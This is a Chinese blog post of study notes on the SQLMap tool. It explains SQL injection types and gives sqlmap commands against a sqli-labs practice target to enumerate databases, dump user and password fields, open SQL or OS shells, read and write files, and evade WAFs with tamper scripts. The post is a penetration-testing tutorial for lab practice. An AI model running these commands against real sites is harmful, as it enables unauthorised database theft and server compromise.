Web安全攻防-----学习笔记(三)之SQLMap

最新推荐文章于 2024-05-04 20:29:53 发布
最新推荐文章于 2024-05-04 20:29:53 发布
阅读量542 收藏 2
点赞数
分类专栏: web 安全 SQLMap 文章标签: SQLMap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxcsdn666/article/details/100598974
版权
web 同时被 3 个专栏收录
16 篇文章 0 订阅
订阅专栏
安全
16 篇文章 0 订阅
订阅专栏
SQLMap
1 篇文章 0 订阅
订阅专栏

第3章 常用的渗透测试工具

3.1 SQLMap详解

SQLMap采用了五种独特的SQL注入技术:

  • 基于布尔类型的盲注,可以根据返回页面  判断 条件真假  的注入
  • 基于时间的盲注,不能根据页面返回的内容判断任何信息,要用条件语句查看时间延迟语句是否已执行(即页面返回时间是否增加)来判断
  • 基于报错注入,页面会返回错误信息,或者把注入的语句的结果直接返回到页面中
  • 联合查询注入,在可以使用Union的情况下的注入
  • 堆查询注入,可以同时执行多条语句时的注入

3.1.2 SQLMap入门

靶机网址:http://43.247.91.228:84/

1.判断是否存在着注入点

假设目标注入点为:http://43.247.91.228:84/Less-1/?id=3,判断其是否存在注入点的命令如下:

sqlmap -u http://43.247.91.228:84/Less-1/?id=3

 当注入点后面>=2个参数时,加双引号

sqlmap -u "http://43.247.91.228:84/Less-1/?id=3&uid=2"

2.判断文本中的请求是否存在注入

命令如下:

sqlmap -r FilePath

3.查询当前用户下的所有数据库

该命令是确定网站存在注入后,用于查询当前用户下的所有数据库;如果当前用户有权限读取包含所有数据库列表信息的表,则可以列出所有数据库。

sqlmap -u http://43.247.91.228:84/Less-1/?id=3 --dbs

 

此处查出5张表。

若继续注入,--dbs缩写成-D xxx,意思是在xxx数据库中查询其他数据。

4.获取数据库中的表名  (不加入-D则会显示所有)

sqlmap -u http://43.247.91.228:84/Less-1/?id=3 -D security --tables

若继续注入,--tables缩写成-T,意思是在某表中继续查询

 5.获取表中的字段名

​sqlmap -u http://43.247.91.228:84/Less-1/?id=3 -D security -T users --columns

若继续注入,--columns缩写成-C

6.获取字段内容

sqlmap -u http://43.247.91.228:84/Less-1/?id=3 -D security -T users -C username,passowrd --dump

 

 7.获取数据库的所有用户

sqlmap -u http://43.247.91.228:84/Less-1/?id=3 --users

 8.获取数据库用户的密码

sqlmap -u "http://43.247.91.228:84/Less-1/?id=3" --passwords

9.获取当前网站数据库的名称

sqlmap -u "http://43.247.91.228:84/Less-1/?id=3" --current-db

10.获取当前网站数据库的用户名称

sqlmap -u "http://43.247.91.228:84/Less-1/?id=3" --current-user

3.1.3 SQLMap进阶:参数讲解

  1. --level 5 :探测等级,默认为1级,5级包含的payload最多,运行速度也比较慢
  2. --is-dba :当前用户是否为管理员权限
  3. --roles:列出数据库管理员角色,也可用-U参数指定想看哪个用户的角色
  4. --refer:Http Refer头,可以在请求中伪造HTTP的refer,当参数设置>=3时,会尝试对refer注入;也可使用refer命令来欺骗,如--refer http://www.baidu.com
  5. --sql-shell:运行自定义sql语句
sqlmap -u "http://43.247.91.228:84/Less-1/?id=3" --sql-shell

  1. --os-cmd,--os-shell:运行任意操作系统命令
  2. --file-read:从数据库服务器中读取文件
  3. --file-write  --file-dest:上传文件到数据库服务器

3.1.4 SQLMap自带绕过脚本tamper的讲解

       可以使用--tamper参数对数据做修改来绕过WAF等设备,其中大部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则,命令如下:sqlmap xxxx --tamper "模块名"。目前官方提供53个绕过脚本,下面是脚本格式:

#sqlmap/tamper/escapequotes.py
#基本格式

from lib.core.enums import PRIORITY
_priority_=PRIORITY.LOWEST         #变量定义

def dependencies():                #函数定义
    pass

def tamper(payload,**kwargs):
    return payload.replace("'","\\'").replace('"','\\"')

   priority定义脚本的优先级,用于有多个tamper脚本的情况;dependencies函数声明该脚本适用/不适用的范围,可空。

一些常用的tamper脚本:

  • apostrophemask.py:将引号替换为UTF-8,用于过滤单引号
  • base64encode.py:替换为base64编码
  • multiplespaces.py:围绕SQL关键字添加多个空格
  • space2plus.py:+号替换空格
  • non recursive replacement.py:用双重语句替代预定义的SQL关键字
  • between.py:用NOT BETWEEN 0 AND 替换大于号(>),用BETWEEN AND替换(=),eg:1 AND A>B--      1 AND A NOT BETWEEN 0 AND B
  • randomcase.py:随机大小写。INSERT  InseRt
  • space2comment.py:空格替换为/**/
  • equaltolike.py:等号替换为like

续:Web安全攻防-----学习笔记(三)之Burp Suite

家住海边就爱浪吖
关注
专栏目录
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
[网络安全自学篇] 八十.WHUCTF之CSS注入、越权、csrf-token窃取及XSS总结
杨秀璋的专栏
06-09 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF隐写和逆向题目,包括文字解密、图片解密、佛语解码、冰蝎流量分析、逆向分析。这篇文章将详细讲解一道CSS注入题目,包括CSS注入、越权、csrf-token窃取及CSP绕过,同时总结XSS绕过知识,希望对您有所帮助。第一次参加CTF,还是学到了很多东西。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
SQLMAP脚本-sql-labs-Less-26-27a
m0_69844818的博客
09-19 1717
sqlmap脚本跑sqli-labs
Web渗透-Sqlmap工具使用
m0_62630794的博客
01-25 3872
SQLMap 是一个自动化的SQL注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库是MySQL 、Oracle 、PostgreSQL 、Microsoft SQL Server、Microsoft Access 、IBM DB2, SQ Lite 、Firebird 、Sybase和SAPMaxDB。以上的查询是指定带参数的url,同样我们也可以从文本文件中获取HTTP请求,这样就可以不设置其他参数。–tables是查询指定数据库里面的表。
sqlmap的使用—初级
qq_40909772的博客
07-01 228
1.实验环境:自建sql注入靶场。 2.使用。 (1)判断是否存在注入点。 py2 sqlmap.py -u http://192.168.171.128:1235/Less-1/?id=1 (2)当注入点后面的参数大于等于两个时,需要加双引号。 py2 sqlmap.py -u "http://192.168.171.128:1235/Less-1/?id=1&uid=2" (3)判断文本中的请求是否存在注入,从文件中加载HTTP请求,SQLMap可以从一个文本文件中获取HTTP请求,这样就可
sqlmap使用教程
热门推荐
hmysn的博客
07-27 1万+
sqlmap是一个自动化的SQL注入工具,主要功能是扫描、发现,并利用给定url的SQL注入漏洞。
Web安全攻防 渗透测试实战指南》学习笔记(5) - Sql注入
白帽子续命指南
04-12 848
如有侵权,请联系删除 Sql注入基础 information_schema 在MySOL 5.0之后,就多出了这个information_schema的数据库,该数据库中存有整个数据库的信息 我记得我最开始看这个的时候,总觉得是一个完整的数据库,里边按理说有很多的数据库,其中一个叫information_schema的数据库里又包含了一整个数据库,完全就是一中套娃的感觉。后来才知道,inform...
Web工具篇SQLMAP(一)
Vi_vids的博客
11-08 287
CTF-Web SQLMAP基本命令 python sqlmap.py -hh //查看手册 python sqlmap.py --version //查看版本 判断是否存在注入点 python sqlmap.py -u 'URL' //GET请求方式的检测(一个参数) python sqlmap.py -u "URL" //GET请求方式的检测(多个参数) ...
sqlmap基础学习笔记
部分学习记录
07-30 1254
此文为自己学习sqlmap基础的笔记,留个痕迹,便于以后复习查询 #sqlmap获取目标 python sqlmap --version python sqlmap -h python sqlmap -hh #sqlmap直连数据库 ##服务型数据库(MySQL、Oracle、Microsoft SQL Server、PostqreSQL etc) DBMS://USER:PASSWORD@DBMS_IP/PORT/DATABASE_NAME 例如:python sqlmap.py -d “mysql://
网络安全最新网络安全-sqlmap学习笔记_sqlmap --no-cast
最新发布
2301_82242964的博客
05-04 644
检测和利用SQL注入的工具。sqlmap官网sqlmapWiki本文参考用户手册,有删减,算是低创,但并非完全翻译,有包含自己的抓包及部分使用sqlmap注入的内容,sqlmap实战在文末链接。--prefix和--suffix在某些情况下,仅当用户提供要添加到注入有效负载的特定后缀时,漏洞参数才可利用。当用户已经知道查询语法并想通过直接提供注入有效载荷前缀和后缀来检测和利用SQL注入时,这些选项很方便出现的另一种情况就会出现。为了检测和利用此SQL注入,您可以让sqlmap 在检测阶段为您检测边界。
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8007
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
Web安全攻防渗透测试实战指南》学习笔记
K1ose的博客
06-17 3846
学习笔记第一章 渗透测试之信息收集第二章第章 第一章 渗透测试之信息收集 知己知彼,百战不殆 ——《孙子兵法》信息收集: 1. 服务器的配置信息 1. 网站敏感信息 具体细节: 1. 收集域名信息:域名->域名注册信息:DNS服务器信息、注册人信息 方法: 1)Whois查询 i. Whois是一个标准的互联网协议,可用于收集网络注册信息,注册的域名,
进阶的sqlmap用法(参数讲解)
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
BT5下使用SQLMAP***演示
weixin_34220623的博客
02-21 270
BT5下使用SQLMAP***演示2012-08-28 10:06:49 来源:colgator's blog简单介绍下sqlmap吧,它是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞,目前支持的数据库是MS-SQL,,MYSQL,ORACLE和POSTGRESQL。SQLMAP采用四种独...
sqlmap的安装与使用
ishopeqq的博客
10-10 1015
一,sqlmap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定URL的SQL注入漏洞,内置了很多绕过插件,支持的数据库有MySQL,Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2,SQLite, Firebird,Sybase和SAP MaxDB。 sqlmap支持五种不同的注入模式: 二,1,基于布尔的盲注,即可以根据返回页面判断条件真假的注入; 2,基于时间的盲注,即不能根据页面返回内容判断任何信息.
sqlmap tamper脚本编写
whatday的专栏
03-14 8319
0x00 sqlmap tamper简介 sqlmap是一个自动化的SQL注入工具,而tamper则是对其进行扩展的一系列脚本,主要功能是对本来的payload进行特定的更改以绕过waf。 0x01 一个最小的例子 为了说明tamper的结构,让我们从一个最简单的例子开始 # sqlmap/tamper/escapequotes.py from lib.core.enums impo
sqlmap中各个 tamper 的作用
烟敛寒林的博客
10-26 4530
各个 tamper 的作用   apostrophemask.py: return payload.replace(''', "%EF%BC%87") if payload else payload 将单引号 url 编码,用于过滤了单引号的情况。 1' AND '1'='1 to 1%EF%BC%87 AND %EF%BC%871%EF%BC%87=%EF%BC%871 适用...
渗透测试学习笔记
山己见的博客
11-04 5366
本文只做学习用途,严禁利用本文提到的技术进行非法攻击,否则后果自负,本人不承担任何责任。 信息收集 收集域名信息 Whois查询 kali:whois baidu.com 爱站工具网:https://whois.aizhan.com 站长之家:http://whois.chinaz.com VirusTotal:https://www.virustotal.com 备案信息查询 ICP备案查询网:http://www.beianbeian.com 天眼查:http://www.tianyancha.
使用SQLmap进行注入测试
野原新之助
11-03 1105
SQLmap SQLmap是一个自动化的SQL注入工具,其主要功能是扫描,发现并利用给定的URL的SQL注入漏洞。 目前支持的数据库是MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Acess,IBM DB2,SQLLite,Firebird,Sybase和SAP MaxDB…… SQLmap采用几种独特的SQL注入技术,分别是盲推...
快速搭建Web攻防Sqli-lab环境:PhpStudy、Firefox插件与Sqlmap安装指南
在本节中,我们将深入探讨如何在Web攻防训练营中搭建Sqli-Lab环境,这是一项重要的实践技能,尤其对于学习和理解SQL注入攻击与防御至关重要。首先,我们使用的工具是phpStudy,一个集成开发环境(IDE)的选择,它...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值